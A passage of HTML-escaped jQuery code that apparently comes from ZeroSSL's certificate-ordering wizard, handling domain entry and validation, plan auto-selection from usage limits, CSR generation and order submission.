				secondChildSpan.after('&lt;i class=&quot;custom remove_domain&quot; data-removeDomain=&quot;root&quot; data-tooltip=&quot;Remove root domain&quot;&gt;&lt;/i&gt;');
			} else {
				secondChildSpan.html('www.' + thisValue); // www version
				secondChildSpan.addClass(&quot;preview-with-www&quot;);
				secondChildSpan.after('&lt;i class=&quot;custom remove_domain&quot; data-removeDomain=&quot;www&quot; data-tooltip=&quot;Remove www subdomain&quot;&gt;&lt;/i&gt;');
			}
			secondChildSpan.show();
        }
    } else if (isBlockedDomain(thisValue)) {
        // empty submit value
        that.closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val('');

        that.closest('.domain').find('.preview').addClass('error');
        that.closest('.domain').find('.preview span:nth-child(1)').html('Currently, we are not able to issue certificates for this domain (&lt;a target=&quot;_blank&quot; style=&quot;pointer-events: auto;&quot; href=&quot;https://help.zerossl.com/hc/en-us/articles/360060119833-Restricted-Countries&quot;&gt;learn more&lt;/a&gt;).');
        that.closest('.domain').find('.preview span:nth-child(2)').html('');
	} else {
		// empty submit value
		that.closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val('');

		// empty values do not cause error
		if (!thisValue) {
			return;
		}

		that.closest('.domain').find('.preview').addClass('error');
		that.closest('.domain').find('.preview span:nth-child(1)').html('Please enter a valid domain');
		that.closest('.domain').find('.preview span:nth-child(2)').html('');
	}

	that.closest('.domain').find('.preview').show();

}


var _changeInterval = null;

body.on('keyup', '[name=&quot;wizard[order][domains][domain]&quot;]', function() {

	// always mark domains-step uncompleted when changes happen
	body.find('[data-step-id=&quot;wizard[order][domains]&quot;]').removeClass('complete');

	var that = $(this);

	// if no value (deleted all), simply process right away
	if (!($.trim(that.val()))) {
	processDomainsToProtect(that, 'keyup');
	return false;
	}

	// if value provided, resume function
	$(that).closest('.domain').addClass('loading');

	clearInterval(_changeInterval);

	// 500ms delay to make sure user has stopped typing
    _changeInterval = setInterval(function() {

        clearInterval(_changeInterval);
		processDomainsToProtect(that, 'keyup');

		body.find('.domain').removeClass('loading');

    }, 500);

});


/* ORDER - WILDCARD SWITCH */
body.on('change', '[name=&quot;wizard[order][domains][wildcard]&quot;]', function() {

	if ($(this).is(':checked')) {

		wildcardMode('on');

	} else {

		wildcardMode('off');

	}

	processDomainsToProtect(body.find('.domain_collection .domain:first-of-type input'), 'wildcardSwitch');

});

function wildcardMode(action, type) {
	if (action === 'off') {

		if (body.find('form[name=&quot;wizard[order][domains]&quot;]').hasClass('is_wildcard')) {

			// strip away *. characters from all places (preview, submit-value and entered-value)
            var valueWithoutWildCard = body.find('.domain_collection .domain:first-of-type .preview:not(.error) span:first-of-type').text().replace('*.', '');
            if (valueWithoutWildCard === &quot;&quot;) {
                valueWithoutWildCard = body.find('.domain_collection .domain:first-of-type [name=&quot;wizard[order][domains][domain]&quot;]').val().replace('*.', '');
            }

            body.find('.domain_collection .domain:first-of-type .preview span:first-of-type').text(valueWithoutWildCard);
			body.find('.domain_collection .domain:first-of-type [name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val(valueWithoutWildCard);
			body.find('.domain_collection .domain:first-of-type [name=&quot;wizard[order][domains][domain]&quot;]').val(valueWithoutWildCard);
		}

		body.find('form[name=&quot;wizard[order][domains]&quot;]').removeClass('is_wildcard');
		body.find('.enter_domain_heading').text('Enter Domains');
		body.find('[name=&quot;wizard[order][domains][wildcard]&quot;]').attr(&quot;checked&quot;, false);
	} else {

		body.find('form[name=&quot;wizard[order][domains]&quot;]').addClass('is_wildcard');
		body.find('.enter_domain_heading').text('Enter Domain');
		body.find('[name=&quot;wizard[order][domains][wildcard]&quot;]').attr(&quot;checked&quot;, true);

	}
}


/* ORDER - ADD &amp; REMOVE DOMAIN */
body.on('click', '[data-action=&quot;wizard[order][domains][add_domain]&quot;]', function() {

	// max number of alled domains
	var maxAllowedDomains = 100;

	if (body.find('.domain_collection .domain').length &gt;= maxAllowedDomains) {

		generalInfo('show', 'info', 'Your plan allows for no more than 100 domains per certificate. For questions, please &lt;a target=&quot;_blank&quot; href=&quot;https://zerossl.com/contact&quot;&gt;contact support&lt;/a&gt;.');
		return false;

	} else {

		generalInfo('hide');

	}

	var newDomainRow = '&lt;div class=&quot;domain&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;wizard[order][domains][domain][submit_value]&quot;&gt; &lt;input type=&quot;text&quot; name=&quot;wizard[order][domains][domain]&quot;  maxlength=&quot;64&quot; placeholder=&quot;Enter Domain&quot; value=&quot;&quot;&gt; &lt;a class=&quot;remove&quot; href=&quot;javascript:void(0)&quot; data-action=&quot;wizard[order][domains][remove_domain]&quot;&gt;&lt;/a&gt; &lt;div class=&quot;preview&quot;&gt; &lt;span&gt;&lt;/span&gt; &lt;span&gt;&lt;/span&gt; &lt;/div&gt;&lt;/div&gt;';

	body.find('.domain_collection').append(newDomainRow);

	processAllDomains();

});

body.on('click', '[data-action=&quot;wizard[order][domains][remove_domain]&quot;]', function() {
	$(this).closest('.domain').remove();

	processAllDomains();

});


function processAllDomains() {

	// process all domains
	body.find('[name=&quot;wizard[order][domains][domain]&quot;]').each(function() {
	processDomainsToProtect($(this));
	});

}


/* WIZARDS - OPEN &amp; CLOSE STEPS */
body.on('click', 'ul.steps &gt; li:not(.open)', function(event) {
    const element = this;

	// no action at all for permanently locked steps
	if ($(element).hasClass('locked_permanently')) {
	return false;
	}

	// remove all alerts
	generalInfo('hide');

	// validate current step and potentially mark completed
	var currentOpenStep = body.find('li.step.open');
	var currentOpenStepID = body.find('li.step.open').attr('data-step-id');

	wizardValidateStep(currentOpenStepID, 'disableAlerts').then(function(valid) {
        if (valid &amp;&amp; !currentOpenStep.hasClass('finalize') /*&amp;&amp; !$(element).hasClass('locked')*/) {
            currentOpenStep.addClass('complete');
        }

        wizardLockUnlockSteps();

        // no further action for locked steps
        if ($(element).hasClass('locked')) {
            return false;
        }

        // then open clicked step
        body.find('ul.steps &gt; li').removeClass('open');
        $(element).addClass('open');

        // auto-select plan
        wizardPreselectPlan();
    });
});


/* WIZARDS - OPEN &amp; CLOSE STEPS */
body.on('click', '[data-action=&quot;wizard[next_step]&quot;]', function() {

	var button = $(this);
	var thisStepID = $(this).closest('li.step').attr('data-step-id');

	const wizardElement = this;
    wizardValidateStep(thisStepID).then(function(validStep) {
        // if step finished
        if (validStep) {

            // if not finalize step, auto-select plan
            if (!$(wizardElement).closest('li.step').hasClass('finalize')) {
                wizardPreselectPlan();
            }

            // mark step completed
            $(wizardElement).closest('li.step').removeClass('open').addClass('complete');

            // if unfinished steps left
            if (body.find('li.step:not(.complete)').length &gt; 0) {

                // open next unfinished step
                var index = 0;

                body.find('li.step:not(.complete):not(.locked_permanently)').each(function() {

                    index ++;

                    // skip all results except first
                    if (index != 1) {
                        return true;
                    }

                    // if locked field, force-unlock it
                    if ($(this).hasClass('locked')) {
                        $(this).removeClass('locked');
                    }

                    $(this).addClass('open');
                });

            } else {

                // show loading
                button.addClass('loading');

                // make sure last &quot;finalize your order&quot; step stays open
                body.find('li.step.finalize').removeClass('complete').addClass('open');

                var freePlanID = body.find('.plan.free [name=&quot;wizard[order][plan][id]&quot;]').val();
                var selectedPlan = body.find('[name=&quot;wizard[order][plan][selected]&quot;]').val();

                // if selected plan is free plan or selected plan is current plan, submit right away
                if ((selectedPlan === freePlanID) || body.find('[name=&quot;wizard[order][plan][id]&quot;][value=&quot;'+selectedPlan+'&quot;]').closest('.plan').find('[name=&quot;wizard[order][plan][is_current_subscription]&quot;]').val()) {
                    submitOrderWizard();
                    return false;
                }

                var	postData = {
                    plan_id: selectedPlan,
                    payment_frequency: body.find('[name=&quot;user[payment_frequency]&quot;]').val(),
                };

                var postDataJSON = JSON.stringify(postData);
                //console.log(postDataJSON);

                $.ajax({
                    type: 'POST',
                    url: '/ajax/advanced_ajax_handler.php?type=change_subscription_plan&amp;_cpt=' + getCookie('_cpt'),
                    data: ({ postArray: postDataJSON }),
                    dataType: &quot;json&quot;,
                    error: function(XMLHttpRequest, textStatus, errorThrown) {
                        //alert(textStatus + ', ' + errorThrown);
                    },
                    success: function(data){

                        button.removeClass('loading');

                        if (data.success === 1) {

                            if (data.message.payment_required == 1 &amp;&amp; data.message.invoice_id) {

                                var	customData = {
                                    invoice_id: data.message.invoice_id
                                };

                                openPopup('checkout_via_popup', customData);

                            }

                            return false;

                        }  else {

                            generalInfo('show', 'error', translateError(data.message));
                            return false;

                        }

                    }

                });

            }


        } else {

            // mark step unfinished
            $(wizardElement).closest('li.step').removeClass('complete');

            wizardLockUnlockSteps();

        }
    });
});


/* WIZARDS - VALIDATE STEP */
function wizardValidateStep(stepID, command) {

	generalInfo('hide');

	switch (stepID) {
        case 'wizard[order][csr]':
            if(body.find('[name=&quot;wizard[order][csr][paste_csr]&quot;]').is(':checked')) {
                const certificateCSR = body.find('[name=&quot;wizard[order][csr][paste_csr_content]&quot;]').val();

                return $.Deferred(function (defer) {
                    const postDataJSON = JSON.stringify({csr: certificateCSR});
                    $.ajax({
                        type: &quot;POST&quot;,
                        url: '/ajax/advanced_ajax_handler.php?type=zerossl_validate_csr',
                        data: ({ postArray: postDataJSON}),
                        dataType: &quot;json&quot;,
                        error: function(XMLHttpRequest, textStatus, errorThrown) {
                            //alert(textStatus + ', ' + errorThrown);
                            console.log(textStatus, errorThrown);
                            defer.resolve(true);
                        },
                        success: function(data){
                            if (data.success === 1) {
                                defer.resolve(true);
                            }  else {
                                if (command !== 'disableAlerts') {
                                    generalInfo('show', 'error', &quot;There is a problem with your CSR: &quot; + data.message);
                                }
                                defer.resolve(false);
                            }
                        }
                    })
                });
            }
            break;

		case 'wizard[order][domains]':

			var validDomains = 0;

			body.find('.domain_collection .domain').each(function() {

				// if no domain or invalid domain provided, error
				if ($(this).find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val() &amp;&amp; isValidDomain($(this).find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val())) {

				validDomains ++;

				}

			});

			if (validDomains &lt; 1) {

				if (command !== 'disableAlerts') {
				generalInfo('show', 'error', 'Error: You have not specified a valid domain name.');
				}

			return $.Deferred().resolve(false);
			}

		break;

		case 'wizard[install][download_install]':

			if (!body.find('li.step.finalize').hasClass('complete')) {
                return $.Deferred().resolve(false);
			}

		break;


	}

	return $.Deferred().resolve(true);

}


/* WIZARDS - UNLOCK STEPS */
function wizardLockUnlockSteps() {

	// if there are no regular (non-locked, non-exit) steps left uncompleted
	if (body.find('li.step:not(.complete):not(.locked)').length &lt; 1) {

		// unlock one of the locked fields
		body.find('ul.steps li.step.locked:first').removeClass('locked');

	} else {

		// else lock all lockable fields
		body.find('ul.steps li.step.is_lockable').addClass('locked').removeClass('complete').removeClass('open');

	}

}


/* ORDER - SWITCH AUTO CSR */
body.on('change', '[name=&quot;wizard[order][csr][auto]&quot;]', function() {

	if ($(this).is(':checked')) {

		body.find('.custom_csr').hide();

	} else {

		body.find('.custom_csr').show();

	}

});


/* ORDER - SWITCH PASTE CSR */
body.on('change', '[name=&quot;wizard[order][csr][paste_csr]&quot;]', function() {

	if ($(this).is(':checked')) {

		body.find('.paste').show();
		body.find('.enter').hide();

	} else {

		body.find('.paste').hide();
		body.find('.enter').show();

	}

});


/* ORDER - SWITCH PASTE SAME TECH CONTACT */
body.on('change', '[name=&quot;wizard[order][csr][custom_tech_same_as_admin]&quot;]', function() {

	if ($(this).is(':checked')) {

		body.find('.form_row.tech_contact .form_row:not(.checkbox)').hide();

	} else {

		body.find('.form_row.tech_contact .form_row:not(.checkbox)').show();

	}

});


/* ORDER - PRE-SELECT PLAN - FREE USER FLOW ONLY */
function wizardPreselectPlan(returnSelectedFeatures) {

	// store usage stats
	var currentStatsUsed90d = parseInt(body.find('[name=&quot;user[stats][used_90day_certificates]&quot;]').val());
	var currentStatsUsed90dWildcards = parseInt(body.find('[name=&quot;user[stats][used_90day_wildcard_certificates]&quot;]').val());
	var currentStatsUsed90dMultiDomain = parseInt(body.find('[name=&quot;user[stats][used_90day_multi_domain_certificates]&quot;]').val());
	var currentStatsUsed1y = parseInt(body.find('[name=&quot;user[stats][used_1_year_certificates]&quot;]').val());
	var currentStatsUsed1yWildcards = parseInt(body.find('[name=&quot;user[stats][used_1_year_wildcard_certificates]&quot;]').val());

	// check if the current plan is an official plan
	var isCurrentPlanOfficial = body.find('[name=&quot;wizard[order][plan][is_current_plan_official]&quot;]').val() === 'true';

	// this array is used for select-lower-plan-popup
	// this is filled sporadically across the functions below
	var selectedFeatures = [];

	// number of domains, wildcard
	var factorNumberOfDomains;
	var factorWildcard = false;

	// check if wildcard by wildcard checkbox as well as by form class &quot;is_wildcard&quot;
	if (body.find('[name=&quot;wizard[order][domains][wildcard]&quot;]').is(':checked') || body.find('form[name=&quot;wizard[order][domains]&quot;]').hasClass('is_wildcard')) {

		factorNumberOfDomains = 1;
		factorWildcard = true;

	} else {

		factorNumberOfDomains = 0;

		body.find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').each(function() {

			if ($(this).val()) {
			factorNumberOfDomains ++;
			}

		});

	}

	// fill selectedFeatures
	if (factorNumberOfDomains &gt; 1) {
	selectedFeatures.push({'key': 2, 'value': 'Multi-Domain (' + factorNumberOfDomains + ' Domains)'});
	}

	// validity
	var factorValidity;

	factorValidity = parseInt(body.find('[name=&quot;wizard[order][validity]&quot;]:checked').val());

	// add-ons
	var factorAddons = [];

	body.find('[name=&quot;wizard[order][addons]&quot;] .form_row.checkbox').each(function() {

		if ($(this).find('input[type=&quot;checkbox&quot;]').is(':checked')) {
		factorAddons.push($(this).find('input[type=&quot;checkbox&quot;]').val());

		// fill selectedFeatures
		selectedFeatures.push({'key': 3, 'value': 'Add-On: ' + $(this).find('label span').text()});

		}

	});

	//console.log('--- NEW LINE ---');
	//console.log('factorNumberOfDomains = ' + factorNumberOfDomains);
	//console.log('factorWildcard = ' + factorWildcard);
	//console.log('factorValidity = ' + factorValidity);
	//console.log('factorAddons = ' + factorAddons);

	var planToSelect = 'none';

	if (factorWildcard === true) {

		// wildcards supported on premium plan
		planToSelect = 'premium';

		// 1-year wildcards are restricted
		if (factorValidity === 365) {

			if (currentStatsUsed1yWildcards &gt;= 1) {
			planToSelect = 'business';
			}

			if (currentStatsUsed1yWildcards &gt;= 3) {
			planToSelect = 'business_40';
			}

			if (currentStatsUsed1yWildcards &gt;= 5) {
			planToSelect = 'business_75';
			}

			if (currentStatsUsed1yWildcards &gt;= 10) {
			planToSelect = 'business_100';
			}

			if (currentStatsUsed1yWildcards &gt;= 15) {
			planToSelect = 'business_150';
			}

			if (currentStatsUsed1yWildcards &gt;= 25) {
			planToSelect = 'business_150';
			generalInfo('show', 'info', 'It looks like you currently have more than 25x 1-year wildcard certificates on your account, which is the maximum we offer using this website. To get more credits, please &lt;a target=&quot;_blank&quot; href=&quot;https://zerossl.com/contact/quote&quot;&gt;contact our team&lt;/a&gt; for a quote.');
			}

		}

	}

	if (factorWildcard !== true &amp;&amp; factorValidity === 365) {

		if (factorNumberOfDomains &gt;= 1) {

			// 1-year certs for up to 3 domains = basic plan
			planToSelect = 'basic';

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 3) {
			planToSelect = 'premium';
			}

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 10) {
			planToSelect = 'business';
			}

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 25) {
			planToSelect = 'business_40';
			}

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 40) {
			planToSelect = 'business_75';
			}

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 75) {
			planToSelect = 'business_100';
			}

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 100) {
			planToSelect = 'business_150';
			}

			if ((factorNumberOfDomains + currentStatsUsed1y) &gt; 150) {
			planToSelect = 'business_150';
			}

		}

	}

	if (factorWildcard !== true &amp;&amp; factorValidity === 90) {

		// multi-domain and add-ons not supported on free plan,
		if (factorNumberOfDomains &gt; 1 || factorAddons.length &gt; 0) {
		planToSelect = 'basic';
		} else if (currentStatsUsed90d &gt;= 3){
		// if user already has 3 or more 90-day certs, upgrade to basic
		planToSelect = 'basic';
		} else {
		// otherwise free plan
		planToSelect = 'free';
		}

	}

	if (!isCurrentPlanOfficial) {
		planToSelect = 'none';
	}

	//console.log('AUTO-SELECT PLAN = ' + planToSelect);

	// generate dynamic summary
	var dynamicSummary = 'Based on your selection of a &lt;strong&gt;';

	if (factorValidity == 365) {

		dynamicSummary += '1-Year ';

		// fill selectedFeatures
		selectedFeatures.push({'key': 1, 'value': '1-Year Certificate'});

	} else {

		dynamicSummary += '90-Day ';

		// fill selectedFeatures
		selectedFeatures.push({'key': 1, 'value': '90-Day Certificate'});

	}

	if (factorWildcard == true) {

		dynamicSummary += 'Wildcard SSL Certificate&lt;/strong&gt; ';

		// fill selectedFeatures
		selectedFeatures.push({'key': 2, 'value': 'Wildcard'});

	} else if (factorNumberOfDomains &gt; 1) {

		var domainCountContent;

		// show credit explanation tooltip for 1-year certs
		if (factorValidity == 365) {
		domainCountContent = '&lt;i class=&quot;domains_credits_tooltip&quot; data-tooltip=&quot;Each domain protected in your 1-Year SSL Certificate will consume one credit from your account.&quot;&gt;'+factorNumberOfDomains+' Domains&lt;/i&gt;';
		} else {
		domainCountContent = factorNumberOfDomains+' Domains';
		}

		dynamicSummary += 'Multi-Domain SSL Certificate ('+domainCountContent+')&lt;/strong&gt; ';

	} else {

		dynamicSummary += 'SSL Certificate&lt;/strong&gt; ';

	}

	if (factorAddons.length &gt; 0) {

		var singularPlural;

		if (factorAddons.length &gt; 1) {
		singularPlural = 'Add-Ons';
		} else {
		singularPlural = 'Add-On';
		}

		dynamicSummary += 'and &lt;strong&gt;'+factorAddons.length+' '+singularPlural+'&lt;/strong&gt; ';

	}

	//console.log(planToSelect);

	// if free plan, or if auto-selected plan is current plan (only for paid users), or if auto-selected plan does not exist on page (only for paid users)
	if (planToSelect === 'free' || body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;] [name=&quot;wizard[order][plan][is_current_subscription]&quot;]').val() || body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;]').length &lt; 1) {
	dynamicSummary += 'you are fine staying on the ';
	} else {
	dynamicSummary += 'you will need the ';
	}

	var displayPlanName;

	// if detected plan exists on page, add it to summary
	if (body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;]').length) {
	displayPlanName = body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;] .top_section span').text();
	} else {
	// else add current plan to summary
	displayPlanName = body.find('[name=&quot;wizard[order][plan][is_current_subscription]&quot;]').closest('.plan').find('.top_section span').text();
	}

	dynamicSummary += '&lt;strong&gt;' + displayPlanName + ' Plan&lt;/strong&gt;.';

	// if only features should be returned, stop function here
	if (returnSelectedFeatures === true) {
	return selectedFeatures;
	}

	// show dynamic summary
	body.find('[data-dynamic-summary=&quot;true&quot;]').html(dynamicSummary);

	//console.log('original planToSelect = ' + planToSelect);

	var autoSelectPlanID;

	// if detected plan exists on page, auto-select it
	if (body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;]').length) {

		// auto-select plan
		body.find('.plans .plan').removeClass('selected');
		body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;]').addClass('selected');

		// fill plan id in hidden inputs
		autoSelectPlanID = body.find('.plans .plan.' + planToSelect + ' input[name=&quot;wizard[order][plan][id]&quot;]').val();

		body.find('[name=&quot;wizard[order][plan][auto_selected]&quot;]').val(autoSelectPlanID);
		body.find('[name=&quot;wizard[order][plan][selected]&quot;]').val(autoSelectPlanID);

	} else {
	// else keep current subscription plan selected

		planToSelect = body.find('[name=&quot;wizard[order][plan][is_current_subscription]&quot;]').closest('.plan').attr('data-plan-identification');

		//console.log('overriden planToSelect = ' + planToSelect);

		// auto-select plan
		body.find('.plans .plan').removeClass('selected');
		body.find('.plans .plan[data-plan-identification=&quot;'+planToSelect+'&quot;]').addClass('selected');

		autoSelectPlanID = body.find('[name=&quot;wizard[order][plan][is_current_subscription]&quot;]').closest('.plan').find('input[name=&quot;wizard[order][plan][id]&quot;]').val();

		body.find('[name=&quot;wizard[order][plan][selected]&quot;]').val(autoSelectPlanID);
		body.find('[name=&quot;wizard[order][plan][auto_selected]&quot;]').val('');

	}

}


/* ORDER - SELECT PLAN */
body.on('click', '[data-action=&quot;wizard[order][select_plan]&quot;]', function() {
	var autoSelectedPlan = parseInt(body.find('[name=&quot;wizard[order][plan][auto_selected]&quot;]').val());

	var currentSelectedPlan = parseInt(body.find('[name=&quot;wizard[order][plan][selected]&quot;]').val());
	var 	currentSelectedPlanName = body.find('[name=&quot;wizard[order][plan][id]&quot;][value=&quot;'+currentSelectedPlan+'&quot;]').closest('.plan').find('.top_section span').text();

	var clickedPlan = parseInt($(this).attr('data-action-id'));
	var targetPlanName = $(this).closest('.plan').find('.top_section span').text();

	// get current usage stats from hidden inputs
	var currentStatsUsed90d = body.find('[name=&quot;user[stats][used_90day_certificates]&quot;]').val();
	var currentStatsUsed90dWildcards = body.find('[name=&quot;user[stats][used_90day_wildcard_certificates]&quot;]').val();
	var currentStatsUsed90dMultiDomain = body.find('[name=&quot;user[stats][used_90day_multi_domain_certificates]&quot;]').val();
	var currentStatsUsed1y = body.find('[name=&quot;user[stats][used_1_year_certificates]&quot;]').val();
	var currentStatsUsed1yWildcards = body.find('[name=&quot;user[stats][used_1_year_wildcard_certificates]&quot;]').val();

	// get current plan limits from hidden inputs
	var currentPlanLimit90d = body.find('[name=&quot;user[stats][allowed_90day_certificates]&quot;]').val();
	var currentPlanLimit90dWildcards = body.find('[name=&quot;user[stats][allowed_90day_wildcard_certificates]&quot;]').val();
	var currentPlanLimit90dMultiDomain = body.find('[name=&quot;user[stats][allowed_90day_multi_domain_certificates]&quot;]').val();
	var currentPlanLimit1y = body.find('[name=&quot;user[stats][allowed_1_year_certificates]&quot;]').val();
	var currentPlanLimit1yWildcards = body.find('[name=&quot;user[stats][allowed_1_year_wildcard_certificates]&quot;]').val();

	// edge case: if user on free plan and used all 90-day certs
	if (targetPlanName === 'Free' &amp;&amp; (currentStatsUsed90d &gt;= currentPlanLimit90d)) {
	return false;
	}

	// if lower plan is selected, show warning popup
	// TODO: checking plan id via &quot;x &lt; y&quot; is not a long-term solution here
	if (clickedPlan &lt; autoSelectedPlan) {

		// get target plan name
		var targetPlanFeaturesHTML = body.find('[name=&quot;wizard[order][plan][id]&quot;][value=&quot;'+clickedPlan+'&quot;]').closest('.plan').find('.features').html();

		var currentUsageStats = 	{
			current_stats_used_90d: currentStatsUsed90d,
			current_stats_used_90d_wildcards: currentStatsUsed90dWildcards,
			current_stats_used_90d_multi_domain: currentStatsUsed90dMultiDomain,
			current_stats_used_1y: currentStatsUsed1y,
			current_stats_used_1y_wildcards: currentStatsUsed1yWildcards,
		}

		var currentPlanLimits = 	{
			current_plan_limit_90d: currentPlanLimit90d,
			current_plan_limit_90d_wildcards: currentPlanLimit90dWildcards,
			current_plan_limit_90d_multi_domain: currentPlanLimit90dMultiDomain,
			current_plan_limit_1y: currentPlanLimit1y,
			current_plan_limit_1y_wildcards: currentPlanLimit1yWildcards,
		}

		// build POST array
		var	customData = {
			current_usage_stats: currentUsageStats,
			current_plan_limits: currentPlanLimits,
			wizard_selected_features: wizardPreselectPlan(true),
			current_selected_plan_name: currentSelectedPlanName,
			target_plan_features: targetPlanFeaturesHTML,
			target_plan_name: targetPlanName,
		};

		openPopup('confirm_wizard_plan_selection', customData);

		return false;

	}

	// change plan
	body.find('.plans .plan').removeClass('selected');
	$(this).closest('.plan').addClass('selected');

	body.find('[name=&quot;wizard[order][plan][selected]&quot;]').val(clickedPlan);

});


/* ORDER - SUBMIT WIZARD */
function submitOrderWizard() {

	// domains &amp; common name
	let certificateDomains = [];
	let certificateCommonName;

    let strict_domains_selector = &quot;wizard[order][domains][domain]strict_domains&quot;
    let strict_domains_element = body.find(`[name=&quot;${strict_domains_selector}&quot;]`);
    let strict_domains_value = strict_domains_element.val() !== &quot;false&quot;
    let wwwonly = strict_domains_element.attr(&quot;data-wwwonly&quot;) === &quot;true&quot;;

	body.find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').each(function(index) {

		if ($(this).val()) {
			certificateDomains.push($(this).val());

			if (index === 0) {
                certificateCommonName = $(this).val();
			}

		}
	});

	// ZERO-157
	// if no auto sugestion with WWW is present || shown in UI, then we send {&quot;strict_domains&quot;: true} to the backend
	const hadPreviewWithWWW = $('.preview-with-www').length === 0;
	const hiddenPreviewWithWWW = $('.preview-with-www').css(&quot;display&quot;) === &quot;none&quot;;

	if (hadPreviewWithWWW || hiddenPreviewWithWWW) {
		strict_domains_value = true;
	}

    if(certificateDomains.length === 1 &amp;&amp; strict_domains_value &amp;&amp; wwwonly) {
        certificateCommonName = certificateDomains[0] = &quot;www.&quot; + certificateDomains[0];
    }

    certificateDomains = certificateDomains.join(',');

    // validity
	let certificateValidityDays = parseInt(body.find('[name=&quot;wizard[order][validity]&quot;]:checked').val());

	// CSR &amp; private key (key pair)
	let certificatePKEncrypted;
	let certificateCSR;

	// pasted CSR, no need to generate key pair
	if (!body.find('[name=&quot;wizard[order][csr][auto]&quot;]').is(':checked') &amp;&amp; body.find('[name=&quot;wizard[order][csr][paste_csr]&quot;]').is(':checked')) {

		certificateCSR = body.find('[name=&quot;wizard[order][csr][paste_csr_content]&quot;]').val();

	} else {
	// we need to generate key pair

		let csrOrganization = body.find('[name=&quot;wizard[order][csr][custom_organization]&quot;]').val();
        let csrOrganizationUnitName = body.find('[name=&quot;wizard[order][csr][custom_department]&quot;]').val();
        let csrLocality = body.find('[name=&quot;wizard[order][csr][custom_city]&quot;]').val();
        let csrState = body.find('[name=&quot;wizard[order][csr][custom_state]&quot;]').val();
        let csrCountry = body.find('[name=&quot;wizard[order][csr][custom_country]&quot;]').val();
        let csrEmail = body.find('[name=&quot;wizard[order][csr][custom_email]&quot;]').val();

		// generate and store key pair
        let certificateKeyPair = generateKeyPair([certificateCommonName, csrOrganization, csrOrganizationUnitName, csrLocality, csrState, csrCountry, csrEmail]);

		// store csr and encrypted private key
		certificateCSR = certificateKeyPair['csr'];
		certificatePKEncrypted = certificateKeyPair['privateKeyEncrypted'];

		//console.log(certificateCSR);

	}

	let	postData = {
		strict_domains: strict_domains_value,
		certificate_domains: certificateDomains,
		certificate_validity_days: certificateValidityDays,
		certificate_csr: certificateCSR,
		certificate_pk_encrypted: certificatePKEncrypted,
	};

	let postDataJSON = JSON.stringify(postData);
	// console.log(postDataJSON);

	$.ajax({
		type: 'POST',
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_create_certificate&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
			//alert(textStatus + ', ' + errorThrown);
		},
		success: function(data){

			if (data.success === 1) {

				closePopup();

				goToPage('/certificate/verify/'+data.message.id, 'verify', 'verify', null, data.message.id, false, ['show', 'success', 'Your certificate has been created and is ready for domain verification.'], null);

			}  else {

				// stop any loading, both popup and non-popup
				body.find('.loading').removeClass('loading');

				generalInfo('show', 'error', translateError(data.message));
				return false;

			}

		}

	});

}

body.on('click', '.subscriptions .plans_page', function() {

	if ($(this).hasClass('disabled')) {
	return false;
	}

	$(this).closest('.plans').toggleClass('page_2');

	$(this).addClass('disabled');
	body.find('.plans_page').not($(this)).removeClass('disabled');

	if ($(this).hasClass('next')) {
	body.find('.plan:not(.page_2)').hide();
	body.find('.plan.page_2').fadeIn(100).css(&quot;display&quot;,&quot;inline-block&quot;);
	} else {
	body.find('.plan.page_2').hide();
	body.find('.plan:not(.page_2)').fadeIn(100).css(&quot;display&quot;,&quot;inline-block&quot;);
	}

});



/* ORDER - CONFIRM PLAN SELECTION POPUP - ADJUST CERTIFICATE BUTTON */
body.on('click', '[data-action=&quot;wizard_adjust_certificate&quot;]', function() {

	body.find('li.step').removeClass('open');
	body.find('li.step[data-step-id=&quot;wizard[order][domains]&quot;]').addClass('open');

	closePopup();

});



/* GENERATE FILE + DOWNLOAD USING JS */
var saveData = (function () {
    var a = document.createElement(&quot;a&quot;);
    document.body.appendChild(a);
    a.style = &quot;display: none&quot;;
    return function (data, fileName, fileType) {
        var content = data,
            blob = new Blob([content], {type: '&quot;' + fileType + '&quot;'}),
            url = window.URL.createObjectURL(blob);
        a.href = url;
        a.download = fileName;
        a.click();
        window.URL.revokeObjectURL(url);
    };
}());



/* VALIDATE - DOWNLOAD AUTH FILE */
body.on('click', '[data-action=&quot;download_auth_file&quot;]', function(event) {

	event.preventDefault();

	// store contents, generate array and insert line breaks
	var fileContentArray = $(this).attr('data-file-content').split(',');
	var fileContentFinal = fileContentArray[0] + '\n' + fileContentArray[1] + '\n' + fileContentArray[2];

	var fileName = $(this).attr('data-file-name');

	// download txt file
	saveData(fileContentFinal, fileName, 'text/plain');

});



/* VALIDATE - SWITCH BETWEEN VALIDATION METHODS */
body.on('change', '[name=&quot;wizard[validate][method]&quot;]', function(event) {

	// changing validation methods will mark all domains as non-completed
	body.find('li.step').removeClass('complete');

	var chosenMethod = body.find('[name=&quot;wizard[validate][method]&quot;]:checked').attr('data-method-id');

	// handle verification boxes show/hide
	body.find('li:not(.open) [data-validation-method]').hide();
	body.find('li:not(.open) [data-validation-method=&quot;'+chosenMethod+'&quot;]').show();
	body.find('li:not(.open) [data-validation-method=&quot;'+chosenMethod+'&quot;] input[type=&quot;radio&quot;]').prop('checked', true);

	// handle verification summary in last step
	updateVerificationSummary();

});



